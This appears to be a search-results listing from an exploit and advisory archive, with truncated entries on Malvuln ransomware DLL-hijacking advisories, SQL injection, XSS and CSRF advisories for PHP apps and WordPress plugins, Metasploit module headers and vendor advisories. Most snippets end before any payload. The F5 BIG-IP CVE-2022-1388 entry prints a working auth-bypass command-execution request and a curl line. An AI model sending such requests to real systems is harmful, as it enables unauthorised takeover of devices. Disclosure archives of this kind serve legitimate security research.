50640 matches found
Ransom.Cryakl Code Execution
Discovery / credits: Malvuln John Page aka hyp3rlinx c 2022 Original source: https://malvuln.com/advisory/2aea3b217e6a3d08ef684594192cafc8.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Ransom.Cryakl Vulnerability: Code Execution Description: Cryakl looks for and loads a DLL...
APT28 FancyBear Code Execution
Discovery / credits: Malvuln John Page aka hyp3rlinx c 2022 Original source: https://malvuln.com/advisory/d6751b148461e0f863548be84020b879.txt Contact: [email protected] Media: twitter.com/malvuln Threat: APT28 FancyBear Vulnerability: Code Execution Description: FancyBear looks for and execute...
School Dormitory Management System 1.0 SQL Injection
Exploit Title: School Dormitory Management System - 'month' SQL Injection Date: 08/05/2022 Exploit Author: Saud Alenazi Vendor Homepage: https://www.sourcecodester.com/ Software Link: https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html Version:...
Ransom.Conti Code Execution
Discovery / credits: Malvuln John Page aka hyp3rlinx c 2022 Original source: https://malvuln.com/advisory/20f0c736a966142de88dee06a2e4a5b1.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Ransom.Conti Vulnerability: Code Execution Description: Conti looks for and executes DLLs ...
Ransom.Petya Code Execution
Discovery / credits: Malvuln John Page aka hyp3rlinx c 2022 Original source: https://malvuln.com/advisory/8ed9a60127aee45336102bf12059a850.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Ransom.Petya Vulnerability: Code Execution Description: Petya looks for and loads a DLL...
Travel Management System 1.0 SQL Injection
Title: Travel Management System 1.0 Multiple SQLi Author: nu11secur1ty Date: 05.07.2022 Vendor: https://code-projects.org/author/fabian/ Software: https://code-projects.org/travel-management-system-using-php-source-code/ Reference:...
F5 BIG-IP Remote Code Execution
F5 BIG-IP RCE exploitation CVE-2022-1388 POST 1: POST /mgmt/tm/util/bash HTTP/1.1 Host: :8443 Authorization: Basic YWRtaW46 Connection: keep-alive, X-F5-Auth-Token X-F5-Auth-Token: 0 "command": "run" , "utilCmdArgs": " -c 'id' " curl commandliner: $ curl -i -s -k -X $'POST' -H $'Host: :8443' -H...
School Dormitory Management 1.0 SQL Injection
Title: School Dormitory Management 1.0 SQLi Author: nu11secur1ty Date: 05.09.2022 Vendor: https://www.sourcecodester.com/users/tips23 Software: https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html Reference:...
Trojan.CryptoLocker Code Execution
Discovery / credits: Malvuln - John Page aka hyp3rlinx c 2022 Original source: https://malvuln.com/advisory/209a288c68207d57e0ce6e60ebf60729.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Trojan.CryptoLocker Vulnerability: Code Execution Description: Cryptolocker drops a PE...
Ransom.CTBLocker Code Execution
Discovery / credits: Malvuln - John Page - aka hyp3rlinx c 2022 Original source: https://malvuln.com/advisory/de25f04dedaffde1be47ef26dc9a8176.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Ransom.CTBLocker Vulnerability: Code Execution Description: CTBLocker looks for and...
ChatBot Application With A Suggestion Feature 1.0 SQL Injection
Exploit Title: ChatBot Application with a Suggestion Feature 1.0 - 'id' Blind SQL Injection Date: 05/05/2022 Exploit Author: Saud Alenazi Vendor Homepage: https://www.sourcecodester.com/ Software Link: https://www.sourcecodester.com/php/15316/chatbot-app-suggestion-phpoop-free-source-code.html...
Trojan-Ransom.Radamant Code Execution
Discovery / credits: Malvuln - John Page aka hyp3rlinx c 2022 Original source: https://malvuln.com/advisory/6152709e741c4d5a5d793d35817b4c3d.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Trojan-Ransom.Radamant Vulnerability: Code Execution Description: Radamant tries to load...
Trojan-Ransom.Cerber Code Execution
Discovery / credits: Malvuln - John Page - aka hyp3rlinx c 2022 Original source: https://malvuln.com/advisory/ae99e6a451bc53830be799379f5c1104.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Trojan-Ransom.Cerber Vulnerability: Code Execution Description: Cerber looks for and...
Trojan-Ransom.LockerGoga Code Execution
Discovery / credits: Malvuln - John Page - aka hyp3rlinx c 2022 Original source: https://malvuln.com/advisory/3b200c8173a92c94441cb062d38012f6.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Trojan-Ransom.LockerGoga Vulnerability: Code Execution Description: LockerGoga looks f...
Trojan.Ransom.Cryptowall Code Execution
Discovery / credits: Malvuln - John Page - aka hyp3rlinx c 2022 Original source: https://malvuln.com/advisory/0CFFEE266A8F14103158465E2ECDD2C1.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Trojan.Ransom.Cryptowall Vulnerability: Code Execution Description: Cryptowall looks f...
REvil.Ransom Code Execution
Discovery / credits: Malvuln - John Page - aka hyp3rlinx c 2022 Original source: https://malvuln.com/advisory/4c5c1731481ea8d67ef6076810c49e00.txt Contact: [email protected] Media: twitter.com/malvuln Threat: REvil.Ransom Vulnerability: Code Execution Description: REvil looks for and executes...
Craft CMS 3.7.36 Password Reset Poisoning Attack
SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Password Reset Poisoning Attack product: Craft CMS vulnerable version: 3.7.36 and potentially lower fixed version: none, see workaround by vendor CVE number: CVE-2022-299...
PHProjekt PhpSimplyGest / MyProjects 1.3.0 Cross Site Scripting
Exploit Title: PHProjekt PhpSimplyGest / MyProjects, 1.3.0 - Stored XSS Cross-Site Scripting Date: 2022-05-05 Exploit Author: Andrea Intilangelo Vendor Homepage: http://www.phprojekt.altervista.org removed demo was at http://phprojekt.altervista.org/phpsimplygest130 Software Link:...
ZoneMinder Language Settings Remote Code Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'ZoneMinder Language Settings Remote Code Execution', 'Description' = %q This module exploits arbitrary file write in debug log file option chaine...
Conti.Ransom Code Execution
Discovery / credits: Malvuln - malvuln.com c 2022 Original source: https://malvuln.com/advisory/710a77804637f65e22a2e230ff6444f9.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Conti.Ransom Vulnerability: Code Execution Description: Conti looks for and loads a DLL named...
Red Planet Laundry Management System 1.0 SQL Injection
Title: Red Planet Laundry Management System 1.0 SQLi Author: nu11secur1ty Date: 05.01.2022 Vendor: https://laundry.redplanetcomputers.com/ Software: https://laundry.redplanetcomputers.com/ Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-28452 Description: The username...
SAP Web Dispatcher HTTP Request Smuggling
Onapsis Security Advisory 2022-0001: HTTP Request Smuggling in SAP Web Dispatcher Impact on Business By injecting an HTTP request as a prefix into a victim's request, a malicious user is able to cause damage in different ways, such as producing a Denial of Service by setting an invalid request as...
Ransom.Conti Code Execution
Discovery / credits: Malvuln - malvuln.com c 2022 Original source: https://malvuln.com/advisory/3c55ee6753408bff2e3e6a392ed9f2a0.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Ransom.Conti Vulnerability: Code Execution Description: Conti looks for and executes DLLs in its...
REvil.Ransom Code Execution
Discovery / credits: Malvuln - malvuln.com c 2022 Original source: https://malvuln.com/advisory/979635229dfcfae1aae74ae296ec78c8.txt Contact: [email protected] Media: twitter.com/malvuln Threat: REvil.Ransom Vulnerability: Code Execution Description: REvil looks for and executes DLLs in its...
Ransom.WannaCry Code Execution
Discovery / credits: Malvuln - John Page aka hyp3rlinx c 2022 Original source: https://malvuln.com/advisory/84c82835a5d21bbcf75a61706d8ab549.txt Contact: [email protected] Media: twitter.com/malvuln ISR: ApparitionSec Threat: Ransom.WannaCry Vulnerability: Code Execution Description: WannaCry...
WordPress Stafflist 3.1.2 Cross Site Scripting
Exploit Title: WordPress Plugin stafflist 3.1.2 - Reflected XSS Authenticated Date: 05-02-2022 Exploit Author: Hassan Khan Yusufzai - Splint3r7 Vendor Homepage: https://wordpress.org/plugins/stafflist/ Version: 3.1.2 Tested on: Firefox Contact me: h at spidersilk.com Summary: A cross site scripti...
BlackBasta Ransom Code Execution
Discovery / credits: Malvuln - malvuln.com c 2022 Original source: https://malvuln.com/advisory/998022b70d83c6de68e5bdf94e0f8d71.txt Contact: [email protected] Media: twitter.com/malvuln Threat: BlackBasta Ransom Vulnerability: Code Execution Description: BlackBasta looks for and loads a DLL...
Ransom.AvosLocker Code Execution
Discovery / credits: Malvuln - malvuln.com c 2022 Original source: https://malvuln.com/advisory/40f2238875fcbd2a92cfefc4846a15a8.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Ransom.AvosLocker Vulnerability: Code Execution Description: The ransomware looks for and executes...
REvil Ransom Code Execution
Discovery / credits: Malvuln - malvuln.com c 2022 Original source: https://malvuln.com/advisory/7d7ee58c2696794b3be958b165eb61a9.txt Contact: [email protected] Media: twitter.com/malvuln Threat: REvil Ransom Vulnerability: Code Execution Description: REvil looks for and executes DLLs in its...
LokiLocker Ransom Code Execution
Discovery / credits: Malvuln - malvuln.com c 2022 Original source: https://malvuln.com/advisory/2ffc2446a2a6cf04c06a85deb43b9fb8.txt Contact: [email protected] Media: twitter.com/malvuln Threat: LokiLocker Ransom Vulnerability: Code Execution Description: LokiLocker looks for and executes DLLs ...
RedLine.Stealer Code Execution
Discovery / credits: Malvuln - malvuln.com c 2022 Original source: https://malvuln.com/advisory/0adb0e2ac8aa969fb088ee95c4a91536.txt Contact: [email protected] Media: twitter.com/malvuln Threat: RedLine.Stealer Vulnerability: Code Execution Description: RedLine looks for and loads a DLL named...
Tenda HG6 3.3.0 Remote Command Injection
Tenda HG6 v3.3.0 Remote Command Injection Vulnerability Vendor: Tenda Technology Co.,Ltd. Product web page: https://www.tendacn.com https://www.tendacn.com/product/HG6.html Affected version: Firmware version: 3.3.0-210926 Software version: v1.1.0 Hardware Version: v1.0 Check Version:...
Conti Ransom Code Execution
Discovery / credits: Malvuln - malvuln.com c 2022 Original source: https://malvuln.com/advisory/9eb9197cd58f4417a27621c4e1b25a71.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Conti Ransom Vulnerability: Code Execution Description: Conti looks for and executes DLLs in its...
VMware Workspace ONE Access Template Injection / Command Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'VMware Workspace ONE Access CVE-2022-22954', 'Description' = %q This module exploits CVE-2022-22954, an unauthenticated server-side template...
Ransom.LockBit DLL Hijacking
Discovery / credits: Malvuln - malvuln.com c 2022 Original source: https://malvuln.com/advisory/96de05212b30ec85d4cf03386c1b84af.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Ransom.LockBit Vulnerability: DLL Hijacking Description: LockBit ransomware looks for and executes...
Strapi 3.6.8 Password Disclosure / Insecure Handling
Exploit Title: Strapi " Date: 2022-03-30 Exploit Author: Kitchaphan Singchai idealphase Vendor Homepage: https://strapi.io/ Software Link: https://github.com/strapi/strapi/releases Vulnerable Version: ..SNIP.. Redirecting to /documentati...
WordPress Stafflist 3.1.2 SQL Injection
Exploit Title: WordPress Plugin stafflist 3.1.2 - SQL Injection Authenticated Date: 05-02-2022 Exploit Author: Hassan Khan Yusufzai - Splint3r7 Vendor Homepage: https://wordpress.org/plugins/stafflist/ Version: 3.1.2 Tested on: Firefox Contact me: h at spidersilk.com Vulnerable Code: $w =...
Covid 19 Travel Pass Management System 1.0 SQL Injection
Title: Covid 19 Travel Pass Management System v1.0 SQLi Author: nu11secur1ty Date: 05.01.2022 Vendor: https://www.sourcecodester.com/users/tips23 Software: https://www.sourcecodester.com/php/15308/covid-19-travel-pass-management-system-phpoop-free-source-code.html Reference:...
WSO Arbitrary File Upload / Remote Code Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'WSO2 Arbitrary File Upload to RCE', 'Description' = %q This module abuses a vulnerability in certain WSO2 products that allow unrestricted file...
WordPress Stafflist 3.1.2 Cross Site Request Forgery
Exploit Title: WordPress Plugin stafflist 3.1.2 - CSRF Authenticated Date: 05-02-2022 Exploit Author: Hassan Khan Yusufzai - Splint3r7 Vendor Homepage: https://wordpress.org/plugins/stafflist/ Version: 3.1.2 Tested on: Firefox Contact me: h at spidersilk.com Summary: A CSRF vulnerability exists i...
Toll Tax Management System 1.0 SQL Injection
Title: Toll Tax Management System v1.0 SQLi Author: nu11secur1ty Date: 04.07.2022 Vendor: https://www.sourcecodester.com/users/tips23 Software: https://www.sourcecodester.com/php/15304/toll-tax-management-system-phpoop-free-source-code.html Reference:...
Home Clean Service System 1.0 SQL Injection
Title: Home Clean Service System v1.0 - 2022 SQLi Author: nu11secur1ty Date: 04.27.2022 Vendor: https://www.sourcecodester.com/users/acetech Software: https://www.sourcecodester.com/php/15293/home-clean-service-free-source-code.html Reference:...
Miele Benchmark Programming Tool 1.1.49 / 1.2.71 Privilege Escalation
SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Privilege Escalation product: Miele Benchmark Programming Tool vulnerable version: at least 1.1.49 and 1.2.71 fixed version: 1.2.72 CVE number: CVE-2022-22521 impact:...
WordPress Curtain 1.0.2 Cross Site Scripting
Exploit Title: Multiple Stored Cross-Site Scripting vulnerabilities in WordPress curtain plugin 1.0.2 Date: 29-03-2022 Exploit Author: Hassan Khan Yusufzai - Splint3r7 Vendor Homepage: https://wordpress.org/plugins/curtain/ Version: 1.0.2 Tested on: Firefox Contact me: h at spidersilk.com...
Backdoor.Win32.Jokerdoor Buffer Overflow
Discovery / credits: Malvuln - malvuln.com c 2022 Original source: https://malvuln.com/advisory/94d1b2510bf96fa6190cd65876bf4c38.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.Jokerdoor Vulnerability: Remote Stack Buffer Overflow Description: The malware listen...
Backdoor.Win32.Agent.aegg Hardcoded Credential
Discovery / credits: Malvuln - malvuln.com c 2022 Original source: https://malvuln.com/advisory/58be35e792476d1c015df7853112d200.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.Agent.aegg Vulnerability: Weak Hardcoded Credentials Description: The malware listens...
Virus.Win32.Qvod.b Insecure Permissions
Discovery / credits: Malvuln - malvuln.com c 2022 Original source: https://malvuln.com/advisory/c44a9580e17bad0aa27329e51b7d0ae0.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Virus.Win32.Qvod.b Vulnerability: Insecure Permissions Description: The malware writes a PE file wit...
Prime95 30.7 Build 9 Buffer Overflow
Exploit Title: Prime95 Version 30.7 build 9 Buffer Overflow RCE Discovered by: Yehia Elghaly Discovered Date: 2022-04-25 Vendor Homepage: https://www.mersenne.org/ Software Link : https://www.mersenne.org/ftproot/gimps/p95v307b9.win32.zip Tested Version: 30.7 build 9 Vulnerability Type: Buffer...
Zepp 6.1.4-play User Account Enumeration
Trovent Security Advisory 2108-02 User account enumeration in password reset function Overview Advisory ID: TRSA-2108-02 Advisory version: 1.0 Advisory status: Public Advisory URL: https://trovent.io/security-advisory-2108-02 Affected product: Zepp Android mobile application...
Trojan-Banker.Win32.Banker.heq Insecure Permissions
Discovery / credits: Malvuln - malvuln.com c 2022 Original source: https://malvuln.com/advisory/f15d05f74899324ecb61ee29ad162fad.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Trojan-Banker.Win32.Banker.heq Vulnerability: Insecure Permissions Description: The malware writes a...